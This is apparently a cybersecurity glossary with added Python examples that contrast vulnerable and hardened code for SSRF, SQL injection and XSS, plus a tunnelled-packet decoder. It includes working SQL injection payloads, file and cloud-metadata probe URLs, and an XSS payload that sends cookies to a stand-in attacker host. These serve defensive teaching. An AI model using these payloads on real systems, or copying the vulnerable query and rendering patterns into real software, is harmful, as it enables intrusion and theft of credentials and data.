SQL injection is a web attack technique in which the attacker inserts Structured Query Language (SQL) statements into input that the application concatenates into a database query, so that the injected text is executed by the database and can read or modify its contents. In advanced cases the attacker uses SQL to write arbitrary files to the server or even execute operating system commands. A successful SQL injection therefore leads to serious business consequences, including data loss, information disclosure, and significant financial impact.
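An added example, not from the original page, of the check a fetch-by-URL feature needs before it makes the request. The DNS answers, the allowlisted host name and the helper names are constructed for the example so that it runs offline; a real deployment resolves with `socket.getaddrinfo()`. The validator rejects non-HTTP schemes, hosts outside an allowlist (when one is configured) and any name or literal that resolves to a private, loopback, link-local or otherwise non-public address, which is how a cloud metadata endpoint such as 169.254.169.254 is kept out of reach.

```python
import ipaddress
from typing import Optional
from urllib.parse import urlsplit

# Constructed DNS answers so the example runs offline. In production, resolve with
# socket.getaddrinfo() and check every address that comes back.
FAKE_DNS = {
    "reports.example.com": ["93.184.216.34"],
    "evil.example.net": ["127.0.0.1"],              # attacker-controlled name pointing inward
    "metadata.google.internal": ["169.254.169.254"],
}


def fake_resolve(host: str) -> list:
    return FAKE_DNS.get(host, [])


def is_public_address(ip: str) -> bool:
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_link_local or a.is_multicast
                or a.is_reserved or a.is_unspecified)


def fetch_vulnerable(url: str) -> str:
    """Shape of the bug: the URL comes straight from the request and is fetched as-is."""
    return f"GET {url}"        # stands in for requests.get(url) in the real application


def validate_outbound_url(url: str, allowed_hosts=frozenset({"reports.example.com"}),
                          resolve=fake_resolve) -> Optional[str]:
    """Return a rejection reason, or None if the server may fetch `url`.
    allowed_hosts=None means any host is acceptable provided it resolves
    only to public addresses."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return "scheme not allowed"
    host = parts.hostname
    if not host:
        return "no host"
    if allowed_hosts is not None and host not in allowed_hosts:
        return "host not on allowlist"
    try:
        addrs = [str(ipaddress.ip_address(host))]       # literal IP: use it directly
    except ValueError:
        addrs = resolve(host)                           # otherwise resolve the name
    if not addrs:
        return "name did not resolve"
    for ip in addrs:
        if not is_public_address(ip):
            return f"resolves to non-public address {ip}"
    return None


if __name__ == "__main__":
    for candidate in ("https://reports.example.com/q", "http://169.254.169.254/latest/meta-data/",
                      "http://[::1]/admin", "file:///etc/passwd", "http://metadata.google.internal/"):
        print(candidate, "->", validate_outbound_url(candidate, allowed_hosts=None))
```

Two caveats the validator alone does not cover: connect to the address that was validated rather than resolving the name a second time (otherwise a DNS-rebinding attacker returns a public address to the check and a private one to the connection), and either disable HTTP redirects or re-run the check on every redirect target.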
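An added example, not from the original page, contrasting the two ways of building the same lookup. The database and its two rows are constructed in memory with Python's `sqlite3`; the lookup, table and payload names are assumptions for the example. The concatenated version is defeated by a tautology that returns every row and by a UNION that pulls the password-hash column into the result, while the parameterised version compares the whole payload as a literal string and matches nothing.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users (username, password_hash) VALUES (?, ?)",
                     [("alice", "$2b$12$hashA"), ("bob", "$2b$12$hashB")])
    return conn


def rows_vulnerable(username: str) -> list:
    """String concatenation: the input is spliced into the SQL text, so a quote
    in it ends the literal and everything after it is parsed as SQL."""
    conn = make_db()
    sql = f"SELECT id, username FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def rows_safe(username: str) -> list:
    """Parameterised query: the driver sends the value separately from the
    statement, so it is only ever compared as data."""
    conn = make_db()
    return conn.execute("SELECT id, username FROM users WHERE username = ?",
                        (username,)).fetchall()


# Two classic payloads
TAUTOLOGY = "' OR '1'='1"                                      # matches every row
UNION_DUMP = "' UNION SELECT id, password_hash FROM users --"  # pulls another column

if __name__ == "__main__":
    print("normal lookup:     ", rows_vulnerable("alice"))
    print("tautology, vuln:   ", rows_vulnerable(TAUTOLOGY))
    print("union dump, vuln:  ", rows_vulnerable(UNION_DUMP))
    print("tautology, safe:   ", rows_safe(TAUTOLOGY))
```

Note that `sqlite3.execute()` refuses stacked statements, so a `'; DROP TABLE users; --` payload fails against this driver; other database drivers accept them, which is why parameterisation rather than driver behaviour is the defence to rely on.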
A threat is a possible event or circumstance that could exploit a vulnerability and violate an organization's security policy. A threat can be intentional (an individual hacker or a criminal organization) or accidental (a malfunction or a natural disaster).
A Trojan horse is malware that deceives users about its real intent by posing as legitimate software. Once inside the network it gives the attacker access to the system later: it sits silently on the computer gathering information or opening holes in its security, or it may seize the computer and lock the user out.
Tunneling is a technique that sends traffic of one network protocol across another network by encapsulating its packets inside packets of the carrier network's protocol. VPNs use it to carry private traffic across the public Internet; attackers use the same mechanism, for example DNS or HTTPS tunnelling, to move traffic past filtering that only inspects the outer protocol.
Unauthorized access refers to a person gaining access to a website, program, server, service, or another user's confidential information without the owner's consent. Many systems raise alerts on unauthorized access attempts, which helps stop an intruder before access is gained.
A virus is malicious software consisting of code attached to legitimate programs. When the program runs, the virus spreads to other files on the computer without the user's knowledge. Viruses also travel on shared media such as Universal Serial Bus (USB) drives. Anti-virus software helps block infection and removes viruses that are already installed.
A vulnerability is a weakness, flaw, or fault in a system that an attacker can exploit. Vulnerabilities can allow attackers to gain unauthorized access and run code, read or corrupt a system's memory, install malware, and steal, destroy, or modify sensitive data. Keeping security patches up to date removes known vulnerabilities. Vulnerabilities are exploited through methods such as SQL injection, buffer overflows, and cross-site scripting (XSS).
A vulnerability assessment is a systematic analysis of security weaknesses in computer networks, systems, hardware, applications, and other parts of the IT estate. It usually relies on tools such as vulnerability and protocol scanners to identify flaws within the organization's IT infrastructure and prioritize them for remediation in the proper context. Types of vulnerability assessment include: 1. Host assessment 2. Network and wireless assessment 3. Database assessment 4. Application scans
Vulnerability management is the continuous set of processes that identify, classify, prioritize, and remediate weaknesses in software, systems, and networks. Vulnerability scanning is the proactive, automated part of vulnerability management that finds candidate vulnerabilities, such as missing patches and insecure configurations.
A web trojan phishing attack is executed through pop-ups that appear while the user is browsing a website. Web trojans can expose a user's session to an attacker: for instance, a pop-up shown during a banking transaction records the credentials and details the user enters and transmits them to the attacker.
A white hat is an individual who intrudes into systems and networks at the request of their organization or with explicit permission, to determine how secure they are against illegal attackers.
A white team is the group that referees an exercise between a red team of attackers and a blue team defending the information systems, setting the rules of engagement, scoring, and adjudicating disputes.
A whitelist (allowlist) specifies the components such as e-mail addresses, users, URLs, IP addresses, domain names, and file hashes that are permitted through a given security control. Once a whitelist is in force, everything is denied except the entries it contains, the opposite of a blacklist, which permits everything except the entries listed.
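An added example, not from the original page, that serves both the packet-sniffing entry above and this one. It constructs a private DNS query (UDP inside IPv4) and encapsulates it IP-in-IP (protocol number 4) between two gateways, then runs a small sniffer-style decoder over the bytes: the decoder parses the IPv4 header, verifies its checksum, and recurses into the tunnel so the inner addresses and payload become visible. All addresses, ports and the payload are constructed; a real sniffer would read the bytes from a raw socket or a capture file instead.

```python
import struct

IPPROTO_IPIP = 4      # IP-in-IP encapsulation
IPPROTO_UDP = 17


def checksum(data: bytes) -> int:
    """One's-complement sum used by the IPv4 header (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ip_bytes(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def ipv4(src: str, dst: str, proto: int, payload: bytes, ident: int = 0x1234) -> bytes:
    """Minimal IPv4 packet: 20-byte header without options, then the payload."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident,
                      0x4000, 64, proto, 0, ip_bytes(src), ip_bytes(dst))
    hdr = hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]   # fill checksum field
    return hdr + payload


def udp(sport: int, dport: int, payload: bytes) -> bytes:
    # A UDP checksum of 0 means "not computed", which IPv4 permits.
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload


def decode(packet: bytes) -> list:
    """Sniffer-style decoder. Returns one tuple per layer, descending into
    IP-in-IP tunnels so the tunnelled traffic is visible too."""
    ver_ihl, _tos, total_len, _id, _frag, _ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", packet[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (ver_ihl & 0x0F) * 4
    if checksum(packet[:ihl]) != 0:          # a valid header sums to zero
        raise ValueError("bad IPv4 header checksum")
    layers = [("ipv4", ip_str(src), ip_str(dst), proto)]
    body = packet[ihl:total_len]
    if proto == IPPROTO_IPIP:
        layers += decode(body)                # recurse into the encapsulated packet
    elif proto == IPPROTO_UDP:
        sport, dport, length, _ = struct.unpack("!HHHH", body[:8])
        layers.append(("udp", sport, dport, body[8:length]))
    else:
        layers.append(("raw", proto, body))
    return layers


def tunnel_example() -> list:
    """Constructed traffic: a 10.0.0.0/8 DNS query carried across a public
    link inside an IP-in-IP tunnel between two gateways."""
    inner = ipv4("10.0.0.5", "10.0.0.9", IPPROTO_UDP, udp(5353, 53, b"query"))
    outer = ipv4("198.51.100.1", "203.0.113.7", IPPROTO_IPIP, inner)
    return decode(outer)


if __name__ == "__main__":
    for layer in tunnel_example():
        print(layer)
```

A capture filter or IDS rule that only looks at the outer header sees a packet between two public gateways with protocol 4 and nothing more; the private addresses, the port 53 and the query text appear only after decapsulation, which is why tunnelled traffic needs the inner layers decoded (or the tunnel terminated at an inspection point) before it can be monitored.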
XML External Entity (XXE)
An XML External Entity (XXE) attack is a web security vulnerability that targets an application parsing XML input. It occurs when XML containing a reference to an external entity is processed by a weakly configured XML parser that resolves such entities. The attacker can then read local files through the entity, and by leveraging XXE to perform server-side request forgery (SSRF) can escalate to compromising the underlying server or other back-end infrastructure. Consequences include disclosure of private data, denial of service, SSRF, port scanning from the viewpoint of the machine where the parser runs, and further system impact. The fix is to disable DTD processing and external entity resolution in the parser.
XSS (Cross-Site Scripting)
Cross-Site Scripting (XSS) is an injection attack in which the threat actor injects malicious scripts into otherwise benign and trusted websites. It exploits web applications that include untrusted input in their pages without proper output encoding, so that a client-side script chosen by the attacker runs in the browsers of other users. The consequences include account hijacking, cookie theft, defacement and false content, and changes to the settings of the victim's account.
YubiKey is a hardware security key, made by Yubico, that provides strong two-factor and multi-factor authentication and can replace passwords entirely where the service supports it. It is a small USB (or NFC) device that implements authentication protocols such as FIDO2/WebAuthn, U2F, one-time passwords, and smart-card (PIV) login to secure access to computers, networks, websites, VPNs, password managers, and other online services.
A zero-day vulnerability is one that becomes known to attackers before the vendor is aware of it. At that point no patch exists, so threat actors can exploit it knowing that no vendor fix is in place, which makes zero-days a severe security threat. Once the vulnerability is disclosed to the vendor it is typically assigned a CVE identifier, and after a patch is released an advisory is published describing it.
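An added example, not from the original page, of the server-side half of the problem: a comment renderer that concatenates untrusted text into HTML beside one that encodes it, and a link renderer that shows why encoding alone is not enough in a URL attribute. The comment template, the function names and the payloads are constructed for the example.

```python
import html
from urllib.parse import urlsplit


# Vulnerable: user-controlled text is concatenated straight into the page.
def render_comment_vulnerable(author: str, body: str) -> str:
    return f'<p class="comment"><b>{author}</b>: {body}</p>'


# Hardened: HTML-encode untrusted text for the element-content context it lands in.
def render_comment(author: str, body: str) -> str:
    return f'<p class="comment"><b>{html.escape(author)}</b>: {html.escape(body)}</p>'


# URL attribute context: encoding is necessary but not sufficient, because a
# javascript: URL contains nothing the encoder changes yet executes on click.
def render_profile_link_vulnerable(url: str) -> str:
    return f'<a href="{url}">profile</a>'


def render_profile_link(url: str) -> str:
    if urlsplit(url).scheme not in ("http", "https"):
        url = "#"                      # refuse javascript:, data:, vbscript: and friends
    return f'<a href="{html.escape(url, quote=True)}">profile</a>'


if __name__ == "__main__":
    payload = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"
    print(render_comment_vulnerable("mallory", payload))
    print(render_comment("mallory", payload))
    print(render_profile_link_vulnerable("javascript:alert(1)"))
    print(render_profile_link("javascript:alert(1)"))
    print(render_profile_link('https://example.com/?q=" onmouseover="alert(1)'))
```

The rule the example illustrates is that encoding is context-specific: element content, attribute values, URLs and JavaScript each need their own treatment, which is why production code uses an auto-escaping template engine and adds a Content Security Policy as a second layer rather than hand-escaping every output.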